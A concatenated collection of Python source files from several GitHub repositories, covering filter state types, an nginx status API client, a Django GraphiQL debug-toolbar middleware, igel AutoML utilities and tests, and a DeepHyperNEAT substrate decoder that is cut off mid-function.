for a GaussianMixtureState.
"""
tag: str = Property(default=None, doc="Unique tag of the Gaussian State.")
BIRTH = 'birth'
'''Tag value used to signify birth component'''
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.tag is None:
self.tag = str(uuid.uuid4())
class ParticleState(State):
"""Particle State type
This is a particle state object which describes the state as a
distribution of particles"""
state_vector: StateVectors = Property(doc='State vectors.')
weight: MutableSequence[Probability] = Property(default=None, doc='Weights of particles')
parent: 'ParticleState' = Property(default=None, doc='Parent particles')
particle_list: MutableSequence[Particle] = Property(default=None,
doc='List of Particle objects')
fixed_covar: CovarianceMatrix = Property(default=None,
doc='Fixed covariance value. Default `None`, where'
'weighted sample covariance is then used.')
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if (self.particle_list is not None) and \
(self.state_vector is not None or self.weight is not None):
raise ValueError("Use either a list of Particle objects or StateVectors and weights,"
" but not both.")
if self.particle_list and isinstance(self.particle_list, list):
self.state_vector = \
StateVectors([particle.state_vector for particle in self.particle_list])
self.weight = \
np.array([Probability(particle.weight) for particle in self.particle_list])
parent_list = [particle.parent for particle in self.particle_list]
if parent_list.count(None) == 0:
self.parent = ParticleState(None, particle_list=parent_list)
elif 0 < parent_list.count(None) < len(parent_list):
raise ValueError("Either all particles should have"
" parents or none of them should.")
if self.parent:
self.parent.parent = None # Removed to avoid using significant memory
if self.state_vector is not None and not isinstance(self.state_vector, StateVectors):
self.state_vector = StateVectors(self.state_vector)
if self.weight is not None and not isinstance(self.weight, np.ndarray):
self.weight = np.array(self.weight)
def __getitem__(self, item):
if self.parent:
p = self.parent[item]
else:
p = None
particle = Particle(state_vector=self.state_vector[:, item],
weight=self.weight[item],
parent=p)
return particle
@property
def particles(self):
return [particle for particle in self]
def __len__(self):
return self.state_vector.shape[1]
@property
def ndim(self):
return self.state_vector.shape[0]
@property
def mean(self):
"""The state mean, equivalent to state vector"""
result = np.average(self.state_vector,
axis=1,
weights=self.weight)
# Convert type as may have type of weights
return result
@property
def covar(self):
if self.fixed_covar is not None:
return self.fixed_covar
cov = np.cov(self.state_vector, ddof=0, aweights=np.array(self.weight))
# Fix one dimensional covariances being returned with zero dimension
return cov
State.register(ParticleState) # noqa: E305
class EnsembleState(Type):
r"""Ensemble State type
This is an Ensemble state object which describes the system state as a
ensemble of state vectors for use in Ensemble based filters.
This approach is functionally identical to the Particle state type except
it doesn't use any weighting for any of the "particles" or ensemble members.
All "particles" or state vectors in the ensemble are equally weighted.
.. math::
\mathbf{X} = [x_1, x_2, ..., x_M]
"""
state_vector: StateVectors = Property(doc="An ensemble of state vectors which represent the "
"state")
timestamp: datetime.datetime = Property(
default=None, doc="Timestamp of the state. Default None.")
@classmethod
def from_gaussian_state(self, gaussian_state, num_vectors):
"""
Returns an EnsembleState instance, from a given
GaussianState object.
Parameters
----------
gaussian_state : :class:`~.GaussianState`
The GaussianState used to create the new EnsembleState.
num_vectors : int
The number of desired column vectors present in the ensemble.
Returns
-------
:class:`~.EnsembleState`
Instance of EnsembleState.
"""
mean = gaussian_state.state_vector.reshape((gaussian_state.ndim,))
covar = gaussian_state.covar
timestamp = gaussian_state.timestamp
return EnsembleState(state_vector=self.generate_ensemble(mean, covar, num_vectors),
timestamp=timestamp)
@classmethod
def generate_ensemble(self, mean, covar, num_vectors):
"""
Returns a StateVectors wrapped ensemble of state vectors, from a given
mean and covariance matrix.
Parameters
----------
mean : :class:`~.numpy.ndarray`
The mean value of the distribution being sampled to generate
ensemble.
covar : :class:`~.numpy.ndarray`
The covariance matrix of the distribution being sampled to
generate ensemble.
num_vectors : int
The number of desired column vectors present in the ensemble,
or the number of "samples".
Returns
-------
:class:`~.EnsembleState`
Instance of EnsembleState.
"""
# This check is necessary, because the StateVector wrapper does
# funny things with dimension.
rng = np.random.default_rng()
if mean.ndim != 1:
mean = mean.reshape(len(mean))
try:
ensemble = StateVectors(
[StateVector((rng.multivariate_normal(mean, covar)))
for n in range(num_vectors)])
# If covar is univariate, then use the univariate noise generation function.
except ValueError:
ensemble = StateVectors(
[StateVector((rng.normal(mean, covar))) for n in range(num_vectors)])
return ensemble
@property
def ndim(self):
"""Number of dimensions in state vectors"""
return np.shape(self.state_vector)[0]
@property
def num_vectors(self):
"""Number of columns in state ensemble"""
return np.shape(self.state_vector)[1]
@property
def mean(self):
"""The state mean, numerically equivalent to state vector"""
return np.average(self.state_vector, axis=1)
@property
def covar(self):
"""Sample covariance matrix for ensemble"""
return np.cov(self.state_vector)
@property
def sqrt_covar(self):
"""sqrt of sample covariance matrix for ensemble, useful for
some EnKF algorithms"""
return ((self.state_vector-np.tile(self.mean, self.num_vectors))
/ np.sqrt(self.num_vectors - 1))
State.register(EnsembleState) # noqa: E305
class CategoricalState(State):
r"""CategoricalState type.
State object representing an object in a categorical state space. A state vector
:math:`\mathbf{\alpha}_t^i = P(\phi_t^i)` defines a categorical distribution over a finite set
of discrete categories :math:`\Phi = \{\phi^m|m\in \mathbf{N}, m\le M\}` for some finite
:math:`M`."""
categories: Sequence[float] = Property(doc="Category names. Defaults to a list of integers.",
default=None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.state_vector = self.state_vector / np.sum(self.state_vector) # normalise state vector
if self.categories is None:
self.categories = list(map(str, range(self.ndim)))
if len(self.categories) != self.ndim:
raise ValueError(
f"ndim of {self.ndim} does not match number of categories {len(self.categories)}"
)
def __str__(self):
strings = [f"P({category}) = {p}"
for category, p in zip(self.categories, self.state_vector)]
string = ',\n'.join(strings)
return string
@property
def category(self):
"""Return the name of the most likely category."""
return self.categories[np.argmax(self.state_vector)]
class CompositeState(Type):
"""Composite state type.
A composition of ordered sub-states (:class:`State`) existing at the same timestamp,
representing an object with a state for (potentially) multiple, distinct state spaces.
"""
sub_states: Sequence[State] = Property(
doc="Sequence of sub-states comprising the composite state. All sub-states must have "
"matching timestamp. Must not be empty.")
default_timestamp: datetime.datetime = Property(
default=None,
doc="Default timestamp if no sub-states exist to attain timestamp from. Defaults to "
"`None`, whereby sub-states will be required to have timestamps.")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if len(self.sub_states) == 0:
raise ValueError("Cannot create an empty composite state")
self._check_timestamp() # validate timestamps of sub-states
@property
def timestamp(self):
return self.default_timestamp
def _check_timestamp(self):
"""Check all timestamps are equal. Replace empty sub-state timestamps with validated
timestamp."""
self._timestamp = None
sub_timestamps = {sub_state.timestamp
for sub_state in self.sub_states
if sub_state.timestamp}
if len(sub_timestamps) > 1:
raise ValueError("All sub-states must share the same timestamp if defined")
if (sub_timestamps and self.default_timestamp
and not sub_timestamps == {self.default_timestamp}):
raise ValueError("Sub-state timestamps and default timestamp must be the same if "
"defined")
if sub_timestamps:
self.default_timestamp = sub_timestamps.pop()
for sub_state in self.sub_states:
sub_state.timestamp = self.default_timestamp
@property
def state_vectors(self):
return [state.state_vector for state in self.sub_states]
@property
def state_vector(self):
"""A combination of the component states' state vectors."""
return StateVector(np.concatenate(self.state_vectors))
def __contains__(self, item):
return self.sub_states.__contains__(item)
def __getitem__(self, index):
if isinstance(index, slice):
return self.__class__(self.sub_states.__getitem__(index))
return self.sub_states.__getitem__(index)
def __iter__(self):
return self.sub_states.__iter__()
def __len__(self):
return self.sub_states.__len__()
State.register(CompositeState) # noqa: E305
```
#### File: types/tests/conftest.py
```python
import pytest
from ..detection import Detection, CompositeDetection
from ..hypothesis import SingleHypothesis, CompositeHypothesis, \
CompositeProbabilityHypothesis, SingleProbabilityHypothesis
from ..prediction import StatePrediction, CompositePrediction
@pytest.fixture()
def sub_predictions1():
return [StatePrediction([0]), StatePrediction([1, 2])]
@pytest.fixture()
def sub_predictions2():
return [StatePrediction([3]), StatePrediction([5, 6])]
@pytest.fixture()
def composite_prediction1(sub_predictions1):
return CompositePrediction(sub_predictions1)
@pytest.fixture()
def composite_prediction2(sub_predictions2):
return CompositePrediction(sub_predictions2)
@pytest.fixture()
def sub_measurements1():
return [Detection([7]), Detection([3])]
@pytest.fixture()
def sub_measurements2():
return [Detection([2]), Detection([8])]
@pytest.fixture()
def composite_measurement1(sub_measurements1):
return CompositeDetection(sub_measurements1)
@pytest.fixture()
def composite_measurement2(sub_measurements2):
return CompositeDetection(sub_measurements2)
@pytest.fixture()
def sub_hypotheses1(sub_predictions1, sub_measurements1):
return [
SingleHypothesis(prediction=sub_prediction, measurement=sub_measurement)
for sub_prediction, sub_measurement in zip(sub_predictions1, sub_measurements1)
]
@pytest.fixture()
def sub_hypotheses2(sub_predictions2, sub_measurements2):
return [
SingleHypothesis(prediction=sub_prediction, measurement=sub_measurement)
for sub_prediction, sub_measurement in zip(sub_predictions2, sub_measurements2)
]
@pytest.fixture()
def composite_hypothesis1(composite_prediction1, composite_measurement1, sub_hypotheses1):
return CompositeHypothesis(sub_hypotheses=sub_hypotheses1,
prediction=composite_prediction1,
measurement=composite_measurement1)
@pytest.fixture()
def composite_hypothesis2(composite_prediction2, composite_measurement2, sub_hypotheses2):
return CompositeHypothesis(sub_hypotheses=sub_hypotheses2,
prediction=composite_prediction2,
measurement=composite_measurement2)
@pytest.fixture()
def sub_probability_hypotheses1(sub_predictions1, sub_measurements1):
return [
SingleProbabilityHypothesis(prediction=sub_prediction, measurement=sub_measurement,
probability=0.5)
for sub_prediction, sub_measurement in zip(sub_predictions1, sub_measurements1)
]
@pytest.fixture()
def sub_probability_hypotheses2(sub_predictions2, sub_measurements2):
return [
SingleProbabilityHypothesis(prediction=sub_prediction, measurement=sub_measurement,
probability=0.2)
for sub_prediction, sub_measurement in zip(sub_predictions2, sub_measurements2)
]
@pytest.fixture()
def composite_probability_hypothesis1(composite_prediction1, composite_measurement1,
sub_probability_hypotheses1):
return CompositeProbabilityHypothesis(sub_hypotheses=sub_probability_hypotheses1,
prediction=composite_prediction1,
measurement=composite_measurement1)
@pytest.fixture()
def composite_probability_hypothesis2(composite_prediction2, composite_measurement2,
sub_probability_hypotheses2):
return CompositeProbabilityHypothesis(sub_hypotheses=sub_probability_hypotheses2,
prediction=composite_prediction2,
measurement=composite_measurement2)
``` |
{
"source": "0snug0/ngxpy",
"score": 3
} |
#### File: ngxpy/ngxpy/ngxpy.py
```python
import requests, json, ConfigParser, os
## TODOs
## 1. Add several common ways to add authentication
## * Basic Auth
## * Custom Headers (X-Auth-Key/X-Auth-User)
# Defaults for .ngxpy.ini if parameters missing
safecfg = { 'schema': 'http',
'host': '127.0.0.1',
'port': '8080',
'status': 'status',
'upstreamConf': 'upstream_conf'
}
cfg = ConfigParser.SafeConfigParser(safecfg)
class ngxpy:
def __init__(self, schema='http',
host='127.0.0.1', port='8080',
status='status', upstreamConf='upstream_conf',
cfgSec=None):
# If .ngxpy.ini exist, use those values, otherwise use function parameters
if cfgSec:
home = os.path.expanduser("~")
file = '{}/.ngxpy.ini'.format(home)
if cfg.read(file):
self.host = self.cfgCheck(cfgSec, 'host')
self.port = self.cfgCheck(cfgSec, 'port')
self.status = self.cfgCheck(cfgSec, 'status')
self.upstreamConf = self.cfgCheck(cfgSec, 'upstreamConf')
self.schema = self.cfgCheck(cfgSec, 'schema')
else:
print '{} file is missing'.format(file)
exit()
else:
self.host = host
self.port = port
self.status = status
self.upstreamConf = upstreamConf
self.schema = schema
self.socket = '{}:{}'.format(self.host, self.port)
self.api = '{}://{}/'.format(self.schema, self.socket)
def cfgCheck(self, sec, param):
try:
return cfg.get(sec, param)
except:
pass
class APIError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
def parse_json(self, request):
try:
return request.json()
except ValueError:
return request.text
def get(self, url, params=None):
r = requests.get(self.api + url, params=params)
return self.parse_json(r)
def get_status(self):
s = self.get(self.status)
return s
def get_stream_status(self):
s = self.get_status()['stream']
return s
def get_upstream_conf(self, **kwargs):
'''
Available Keys:
stream= (Select TCP/UDP server group)
upstream=name (Mandatory)
id=number
remove= (Removes server from group)
add= (Adds server to group)
backup= (Add server as backup in group)
down= (Marks server as down in group)
drain= (Drains server from group)
up= (Marks server as up in group)
server=address
service=name
weight=number
max_conns=number
max_fails=number
fail_timeout=time
slow_start=time
route=string (useful for sticky route Loadbalancer)
'''
u = self.get(self.upstreamConf, params=kwargs)
return u
# isHttp=False are tcp/udp zones and upstreams
def get_server_zones(self, isHttp=True, zone=None):
s = self.get_status()['server_zones']
return s
def get_upstreams(self, isHttp=True, upstream=None):
s = self.get_status()['upstreams']
return s
def get_caches(self):
s = self.get_status()['caches']
return s
def get_peer_stats(self, upstream, peer_id=None, isHttp=True):
peers = []
if isHttp:
s = self.get_status()['upstreams'][upstream]['peers']
else:
s = self.get_stream_status()['upstreams'][upstream]['peers']
for p in s:
if peer_id:
if peer_id == p['id']:
return p
else:
peers.append(p)
return peers
def list_server_zones(self, isHttp=True):
server_zones = []
if isHttp:
s = self.get_status()['server_zones']
else:
s = self.get_stream_status()['server_zones']
for z in s:
server_zones.append(z)
return server_zones
def list_upstreams(self, isHttp=True):
upstreams = []
if isHttp:
s = self.get_status()['upstreams']
else:
s = self.get_stream_status()['upstreams']
for u in s:
upstreams.append(u)
return upstreams
def list_caches(self):
caches = []
s = self.get_status()['caches']
for c in s:
caches.append(c)
return caches
def num_of_peers(self, upstream, isHttp=True):
if isHttp:
s = self.get_status()['upstreams'][upstream]['peers']
else:
s = self.get_stream_status()['upstreams'][upstream]['peers']
return len(s)
``` |
{
"source": "0soft/django-graphiql-debug-toolbar",
"score": 2
} |
#### File: django-graphiql-debug-toolbar/graphiql_debug_toolbar/middleware.py
```python
import functools
import json
from collections import OrderedDict
from django.template.loader import render_to_string
from django.utils.encoding import force_text
from debug_toolbar import middleware as mmod
from debug_toolbar.middleware import _HTML_TYPES
from debug_toolbar.middleware import DebugToolbarMiddleware as BaseMiddleware
from debug_toolbar.middleware import get_show_toolbar
from debug_toolbar.toolbar import DebugToolbar
from graphene_django.views import GraphQLView
from .serializers import CallableJSONEncoder
__all__ = ['DebugToolbarMiddleware']
class _DebugToolbar(DebugToolbar):
def __init__(self, middleware, *args, **kwargs):
middleware._toolbar = self
super().__init__(*args, **kwargs)
class MockToolbar(object):
def __init__(self, middleware):
self._middleware = middleware
def __enter__(self):
mmod.DebugToolbar = functools.partial(_DebugToolbar, self._middleware)
def __exit__(self, exc_type, exc_val, exc_tb):
mmod.DebugToolbar = DebugToolbar
def set_content_length(response):
if response.has_header('Content-Length'):
response['Content-Length'] = str(len(response.content))
def get_payload(request, response, toolbar):
content = force_text(response.content, encoding=response.charset)
payload = json.loads(content, object_pairs_hook=OrderedDict)
payload['debugToolbar'] = OrderedDict([('panels', OrderedDict())])
for panel in reversed(toolbar.enabled_panels):
if panel.panel_id == 'TemplatesPanel':
continue
panel.generate_stats(request, response)
panel.generate_server_timing(request, response)
if panel.has_content:
title = panel.title
else:
title = None
payload['debugToolbar']['panels'][panel.panel_id] = {
'title': title,
'subtitle': panel.nav_subtitle,
}
toolbar.store()
payload['debugToolbar']['storeId'] = toolbar.store_id
return payload
class DebugToolbarMiddleware(BaseMiddleware):
def process_view(self, request, view_func, *args):
if hasattr(view_func, 'view_class') and\
issubclass(view_func.view_class, GraphQLView):
request._graphql_view = True
def __call__(self, request):
if not get_show_toolbar()(request) or request.is_ajax():
return self.get_response(request)
with MockToolbar(self):
response = super().__call__(request)
content_type = response.get('Content-Type', '').split(';')[0]
html_type = content_type in _HTML_TYPES
graphql_view = getattr(request, '_graphql_view', False)
if response.status_code == 200 and graphql_view and html_type:
template = render_to_string('graphiql_debug_toolbar/base.html')
response.write(template)
set_content_length(response)
if html_type or not (
graphql_view and content_type == 'application/json'):
return response
toolbar = self._toolbar
payload = get_payload(request, response, toolbar)
response.content = json.dumps(payload, cls=CallableJSONEncoder)
set_content_length(response)
return response
``` |
{
"source": "0sparsh2/igel",
"score": 2
} |
#### File: igel/auto/cnn.py
```python
import json
import logging
import os
import autokeras as ak
from igel.auto.defaults import Defaults
from igel.auto.models import Models
from igel.constants import Constants
from igel.utils import read_json, read_yaml
from tensorflow.keras.models import load_model
logger = logging.getLogger(__name__)
class IgelCNN:
defaults = Defaults()
model = None
dataset_props = {}
model_props = {}
model_args = {}
training_args = {}
results_path = Constants.results_dir
def __init__(self, **cli_args):
self.cmd: str = cli_args.get("cmd")
self.data_path: str = cli_args.get("data_path")
self.config_path: str = cli_args.get("yaml_path")
self.task = cli_args.get("task")
logger.info(f"Executing command: {self.cmd}")
logger.info(f"Reading data from: {self.data_path}")
logger.info(f"Reading yaml configs from: {self.config_path}")
if self.cmd == "train":
if not self.config_path:
self.model_type = self.task
else:
self.file_ext: str = self.config_path.split(".")[1]
if self.file_ext not in ["yaml", "yml", "json"]:
raise Exception(
"Configuration file can be a yaml or a json file!"
)
self.configs: dict = (
read_json(self.config_path)
if self.file_ext == "json"
else read_yaml(self.config_path)
)
self.dataset_props: dict = self.configs.get(
"dataset", self.defaults.dataset_props
)
self.model_props: dict = self.configs.get(
"model", self.defaults.model_props
)
self.training_args: dict = self.configs.get(
"training", self.defaults.training_args
)
self.model_args = self.model_props.get("arguments")
self.model_type = self.task or self.model_props.get("type")
else:
self.model_path = cli_args.get(
"model_path", self.defaults.model_path
)
logger.info(f"path of the pre-fitted model => {self.model_path}")
self.prediction_file = cli_args.get(
"prediction_file", self.defaults.prediction_file
)
# set description.json if provided:
self.description_file = cli_args.get(
"description_file", self.defaults.description_file
)
# load description file to read stored training parameters
with open(self.description_file) as f:
dic = json.load(f)
self.model_type: str = dic.get("task") # type of the model
self.dataset_props: dict = dic.get(
"dataset_props"
) # dataset props entered while fitting
getattr(self, self.cmd)()
def _create_model(self, *args, **kwargs):
model_cls = Models.get(self.model_type)
model = (
model_cls() if not self.model_args else model_cls(**self.model_args)
)
return model
def save_desc_file(self):
desc = {
"task": self.model_type,
"model": self.model.__class__.__name__,
"dataset_props": self.dataset_props or None,
"model_props": self.model_props or None,
}
try:
logger.info(f"saving fit description to {self.description_file}")
with open(self.description_file, "w", encoding="utf-8") as f:
json.dump(desc, f, ensure_ascii=False, indent=4)
except Exception as e:
logger.exception(
f"Error while storing the fit description file: {e}"
)
def save_model(self):
exp_model = self.model.export_model()
logger.info(f"model type: {type(exp_model)}")
try:
exp_model.save("model", save_format="tf")
return True
except Exception:
exp_model.save(f"model.h5")
def train(self):
train_data = ak.image_dataset_from_directory(self.data_path)
self.model = self._create_model()
logger.info(f"executing a {self.model.__class__.__name__} algorithm...")
logger.info(f"Training started...")
self.model.fit(train_data, **self.training_args)
logger.info("finished training!")
self.save_desc_file()
saved = self.save_model()
if saved:
logger.info(f"model saved successfully")
def load_model(self):
logger.info("loading model...")
loaded_model = load_model("model", custom_objects=ak.CUSTOM_OBJECTS)
logger.info("model loaded successfully")
return loaded_model
def evaluate(self):
trained_model = self.load_model()
test_data = ak.image_dataset_from_directory(self.data_path)
trained_model.evaluate(test_data)
def predict(self):
trained_model = self.load_model()
pred_data = ak.image_dataset_from_directory(self.data_path)
trained_model.predict(pred_data)
```
#### File: igel/servers/helper.py
```python
import logging
import os
logger = logging.getLogger(__name__)
def remove_temp_data_file(f):
"""
remove temporary file, where request payload has been stored in order to be used by igel to generate predictions
"""
# remove temp file:
if os.path.exists(f):
logger.info(f"removing temporary file: {f}")
os.remove(f)
```
#### File: igel/igel/utils.py
```python
import json
import logging
import joblib
import pandas as pd
import yaml
from igel.configs import configs
from igel.data import metrics_dict, models_dict
logger = logging.getLogger(__name__)
def create_yaml(data, f):
try:
with open(f, "w") as yf:
yaml.dump(data, yf, default_flow_style=False)
except yaml.YAMLError as exc:
logger.exception(exc)
return False
else:
return True
def read_yaml(f):
with open(f) as stream:
try:
res = yaml.safe_load(stream)
except yaml.YAMLError as exc:
logger.exception(exc)
else:
return res
def read_json(f):
try:
with open(f) as file:
data = json.load(file)
except Exception as e:
logger.exception(e.args)
else:
return data
def extract_params(config):
assert (
"model" in config.keys()
), "model parameters need to be provided in the yaml file"
assert (
"target" in config.keys()
), "target variable needs to be provided in the yaml file"
model_params = config.get("model")
model_type = model_params.get("type")
algorithm = model_params.get("algorithm")
target = config.get("target")
if any(not item for item in [model_type, target, algorithm]):
raise Exception("parameters in the model yaml file cannot be None")
else:
return model_type, target, algorithm
def _reshape(arr):
if len(arr.shape) <= 1:
arr = arr.reshape(-1, 1)
return arr
def load_trained_model(f: str = ""):
"""
load a saved model from file
@param f: path to model
@return: loaded model
"""
try:
if not f:
logger.info(f"result path: {configs.get('results_path')} ")
logger.info(
f"loading model form {configs.get('default_model_path')} "
)
with open(configs.get("default_model_path"), "rb") as _model:
model = joblib.load(_model)
else:
logger.info(f"loading from {f}")
with open(f, "rb") as _model:
model = joblib.load(_model)
return model
except FileNotFoundError:
logger.error(f"File not found in {configs.get('default_model_path')}")
def load_train_configs(f=""):
"""
load train configurations from model_results/descriptions.json
"""
try:
if not f:
logger.info(
f"loading descriptions.json form {configs.get('description_file')} "
)
with open(configs.get("description_file"), "rb") as desc_file:
training_config = json.load(desc_file)
else:
with open(f, "rb") as desc_file:
training_config = json.load(desc_file)
return training_config
except FileNotFoundError as e:
logger.error(f"File not found: {e}")
except Exception as e:
logger.error(e)
def get_expected_scaling_method(training_config):
"""
get expected scaling method from the parsed training configuration (description.json)
"""
dataset_props = training_config.get("dataset_props")
if not dataset_props:
return
preprocess_options = dataset_props.get("preprocess")
if not preprocess_options:
return
scaling_options = preprocess_options.get("scale")
if not scaling_options:
return
return scaling_options.get("method")
def show_model_info(model_name: str, model_type: str):
if not model_name:
print(f"Please enter a supported model")
print_models_overview()
else:
if not model_type:
print(
f"Please enter a type argument to get help on the chosen model\n"
f"type can be whether regression, classification or clustering \n"
)
print_models_overview()
return
if model_type not in ("regression", "classification", "clustering"):
raise Exception(
f"{model_type} is not supported! \n"
f"model_type need to be regression, classification or clustering"
)
models = models_dict.get(model_type)
model_data = models.get(model_name)
model, link, *cv_class = model_data.values()
print(
f"model type: {model_type} \n"
f"model name: {model_name} \n"
f"sklearn model class: {model.__name__} \n"
f"{'-' * 60}\n"
f"You can click the link below to know more about the optional arguments\n"
f"that you can use with your chosen model ({model_name}).\n"
f"You can provide these optional arguments in the yaml file if you want to use them.\n"
f"link:\n{link} \n"
)
def tableize(df):
"""
pretty-print a dataframe as table
"""
if not isinstance(df, pd.DataFrame):
return
df_columns = df.columns.tolist()
max_len_in_lst = lambda lst: len(sorted(lst, reverse=True, key=len)[0])
align_center = (
lambda st, sz: "{0}{1}{0}".format(" " * (1 + (sz - len(st)) // 2), st)[
:sz
]
if len(st) < sz
else st
)
align_right = (
lambda st, sz: "{}{} ".format(" " * (sz - len(st) - 1), st)
if len(st) < sz
else st
)
max_col_len = max_len_in_lst(df_columns)
max_val_len_for_col = {
col: max_len_in_lst(df.iloc[:, idx].astype("str"))
for idx, col in enumerate(df_columns)
}
col_sizes = {
col: 2 + max(max_val_len_for_col.get(col, 0), max_col_len)
for col in df_columns
}
build_hline = lambda row: "+".join(
["-" * col_sizes[col] for col in row]
).join(["+", "+"])
build_data = lambda row, align: "|".join(
[
align(str(val), col_sizes[df_columns[idx]])
for idx, val in enumerate(row)
]
).join(["|", "|"])
hline = build_hline(df_columns)
out = [hline, build_data(df_columns, align_center), hline]
for _, row in df.iterrows():
out.append(build_data(row.tolist(), align_right))
out.append(hline)
return "\n".join(out)
def print_models_overview():
print(f"\nIgel's supported models overview: \n")
reg_algs = list(models_dict.get("regression").keys())
clf_algs = list(models_dict.get("classification").keys())
cluster_algs = list(models_dict.get("clustering").keys())
df_algs = (
pd.DataFrame.from_dict(
{
"regression": reg_algs,
"classification": clf_algs,
"clustering": cluster_algs,
},
orient="index",
)
.transpose()
.fillna("----")
)
df = tableize(df_algs)
print(df)
```
#### File: tests/test_igel/test_igel.py
```python
import os
import pytest
from igel import Igel
from .constants import Constants
from .helper import remove_folder
from .mock import MockCliArgs
os.chdir(os.path.dirname(__file__))
@pytest.fixture
def mock_args():
yield MockCliArgs
remove_folder(Constants.model_results_dir)
assert Constants.model_results_dir.exists() == False
def test_fit(mock_args):
"""
test the fit model functionality
"""
assert mock_args is not None
Igel(**mock_args.fit)
assert Constants.model_results_dir.exists() == True
assert Constants.description_file.exists() == True
assert Constants.evaluation_file.exists() == False
def test_export(mock_args):
"""
test the export model functionality
"""
assert mock_args is not None
Igel(**mock_args.fit)
Igel(**mock_args.export)
assert Constants.onnx_model_file.exists() == True
``` |
{
"source": "0ssifrage/tang300",
"score": 3
} |
#### File: 0ssifrage/tang300/trim2.py
```python
import json
def main():
f = open('tang300.v3.json', 'r')
ps = json.load(f)
np = []
for p in ps:
b = False
if p[3][0][-1] == u',':
t = []
for i in xrange(len(p[3])/2):
t.append(p[3][2*i]+p[3][2*i+1])
p[3] = t
np.append(p)
f2 = open('tang300.v4.json', 'w')
s = json.dumps(np, ensure_ascii=False, indent=2)
f2.write(s.encode('utf-8'))
f.close()
f2.close()
main()
``` |
{
"source": "0sw4l/Cuke",
"score": 2
} |
#### File: Cuke/TodoList/models.py
```python
from django.db import models
from django.contrib.auth.models import User
class Cliente(User):
titulo = (
('Sr', 'Sr'),
('Srita', 'Srita'),
('Sra', 'Sra'),
('Don', 'Don'),
('Ingeniero', 'Ingeniero'),
('Doctor', 'Doctor'))
tratamiento = models.CharField(max_length=15,choices=titulo,default=None)
def __str__(self):
return '{0} - {1}'.format(self.username, self.tratamiento)
class Categoria(models.Model):
nombre = models.CharField(max_length=10)
def __str__(self):
return self.nombre
class Nota(models.Model):
usuario = models.ForeignKey(Cliente)
nota = models.CharField(max_length=50)
categoria = models.ForeignKey(Categoria)
lista = (
('Urgente', 'Urgente'),
('Normal', 'Normal'),
('Relajao', 'Rejalao'),
('Pendiente', 'Pendiente'),
)
prioridad = models.CharField(max_length=10,choices=lista,default=None)
completada = models.BooleanField(default=False)
def __str__(self):
return self.nota
``` |
{
"source": "0T34/DeepHyperNEAT",
"score": 3
} |
#### File: DeepHyperNEAT/deep_hyperneat/decode.py
```python
import numpy as np
import itertools as it
from deep_hyperneat.activations import ActivationFunctionSet
from deep_hyperneat.phenomes import FeedForwardSubstrate
import time
def decode(cppn, input_dimensions, output_dimensions, sheet_dimensions=None):
'''
Decodes a CPPN into a substrate.
cppn -- CPPN
input_dimensions -- dimensions of substrate input layer
output_dimension -- dimensions of substrate output layer
sheet_dimensions -- optional substrate sheet dimensions
'''
# Create input layer coordinate map from specified input dimensions
x = np.linspace(-1.0, 1.0, input_dimensions[1]) if (input_dimensions[1] > 1) else [0.0]
y = np.linspace(-1.0, 1.0, input_dimensions[0]) if (input_dimensions[0] > 1) else [0.0]
input_layer = list(it.product(x,y))
# Create output layer coordinate map from specified output dimensions
x = np.linspace(-1.0,1.0,output_dimensions) if (output_dimensions > 1) else [0.0]
y = [0.0]
output_layer = list(it.product(x,y))
# Create sheet coordinate map from given sheet dimensions (if any)
if sheet_dimensions:
x = np.linspace(-1.0, 1.0, sheet_dimensions[1]) if (sheet_dimensions[1] > 1) else [0.0]
y = np.linspace(-1.0, 1.0, sheet_dimensions[0]) if (sheet_dimensions[0] > 1) else [0.0]
sheet = list(it.product(x,y))
else:
sheet = input_layer
# Create list of mappings to be created between substrate sheets
connection_mappings = [cppn.nodes[x].cppn_tuple for x in cppn.output_nodes if cppn.nodes[x].cppn_tuple[0] != (1,1)]
# Create substrate representation (dictionary of sheets and their respective coordinate maps)
hidden_sheets = {cppn.nodes[node].cppn_tuple[0] for node in cppn.output_nodes}
substrate = {s:sheet for s in hidden_sheets}
substrate[(1,0)] = input_layer
substrate[(0,0)] = output_layer
substrate[(1,1)] = [(0.0,0.0)]
# Create dictionary of output node IDs to their respective mapping tuples
cppn_idx_dict = {cppn.nodes[idx].cppn_tuple:idx for idx in cppn.output_nodes}
# Create the substrate
return create_substrate(cppn, substrate, connection_mappings, cppn_idx_dict)
def create_substrate(cppn, substrate, mapping_tuples, id_dict, act_func="relu"):
'''
Creates a neural network from a CPPN and substrate representation.
Based on PurePLES. Copyright (c) 2017 <NAME> & <NAME>.
cppn -- CPPN
substrate -- substrate representation (a dictionary of sheets and their respective coordinate maps)
mapping_tuples -- list of mappings to be created between substrate sheets
id_dict -- dictionary of output node IDs and their respective mapping tuples
act_func -- optional argument for the activation function of the substrate
'''
node_evals, layers = [], gather_layers(substrate)
# Assign coordinates to input, output, and bias layers
input_coordinates, output_coordinates, bias_coordinates = (substrate[(1,0)],(1,0)), (substrate[(0,0)],(0,0)), (substrate[(1,1)],(1,1))
# Assign ids to nodes in the substrate
input_node_ids = list(range(len(input_coordinates[0])))
bias_node_ids = list(range(len(input_node_ids), len(input_node_ids+bias_coordinates[0])))
output_node_ids = list(range(len(input_node_ids+bias_node_ids), len(input_node_ids+bias_node_ids+output_coordinates[0])))
# Remove the input and output layers from the substrate dictionary
del substrate[(1,0)], substrate[(0,0)], substrate[(1,1)]
# Create hidden layer coordinate maps
hidden_coordinates = [(substrate[k], k) for k in substrate.keys()]
# Assign ids to nodes in all hidden layers
number_of_hidden_nodes = sum([len(layer[0]) for layer in hidden_coordinates])
start_index = len(input_node_ids+output_node_ids+bias_node_ids)
hidden_node_ids = list(range(start_index, start_index+number_of_hidden_nodes))
# Get activation function for substrate
act_func_set = ActivationFunctionSet()
hidden_activation = act_func_set.get(act_func)
output_activation = act_func_set.get('linear')
# Decode depending on whether there are hidden layers or not
if hidden_node_ids:
# Query CPPN for mapping between output layer and topmost hidden layer
out_hid_mapping_tuples = [mapping for mapping in mapping_tuples if mapping[1] == (0,0)]
out_node_counter, idx, hidden_idx = 0, 0, 0
# For each coordinate in output sheet
for oc in output_coordinates[0]:
# Adding Biases from Output to Hidden
node_connections = query_cppn(cppn,oc,output_coordinates,bias_coordinates,bias_node_ids[0], id_dict)
# For each connection mapping
